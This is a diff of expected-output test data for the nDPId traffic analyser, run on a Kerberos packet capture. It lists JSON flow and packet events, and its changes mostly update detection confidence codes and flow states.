00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 
+00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="} 
@@ -132,32 +128,32 @@ 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7580000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7580000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 